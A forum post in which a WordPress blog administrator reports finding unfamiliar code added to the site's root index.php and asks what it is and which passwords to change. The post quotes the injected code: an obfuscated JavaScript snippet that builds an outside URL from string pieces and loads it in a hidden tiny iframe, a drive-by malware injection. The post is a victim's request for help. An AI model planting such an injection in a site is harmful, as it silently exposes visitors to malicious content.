In index.php I think this is normal,
/** Loads the WordPress Environment and Template */ require('./wp-blog-header.php'); ?>
Right after that inside index.php, I recently found this:
<?php echo 'status=' ';nf='ifr';r='3';i='gi?';x='u';ei='r';b='//g';kh='.c';l='s';e='ame';t='/i';k='pt0';jl='h';ou=':';yv='.r';j='n';tl='c';tp='ttp';pa=nf.concat(e);nj=l.concat(ei,tl);h=jl.concat(tp,ou,b,k,yv,x,t,j,kh,i,r);var qb=document.createElement(pa);qb.setAttribute('width','5');qb.setAttribute('height','5');qb.setAttribute('style','display:none');qb.setAttribute(nj,h);document.body.appendChild(qb);'; ?>
Background: I have a fairly new WP 2.7 blog. I'm the Administrator, and I have a couple Authors. The site was running live normally on Sunday. On Tuesday I looked and the site was down with a short error message that mentioned mysite.com/index.php (which I know is normally just the index.php in the main blog folder, it only loads the header, it's not my theme's template index.php). So I looked inside the index.php to see if it was normal, and it did not appear normal to me. I have not changed this file manually, ever, as far as I can remember it should be the default index.php that came with WP 2.6.x.
So when I found the above unknown-code I replaced index.php with a default index.php (the site immediately worked again). So I changed some of my passwords in case I was hacked: I changed my WP Admin password, and my Cpanel login password. I haven't changed MySQL database password and wp-config yet, should I do that too?
No other signs of hacking yet, I'm going to reserach it more now & first wanted the Forum's reading of what that code is.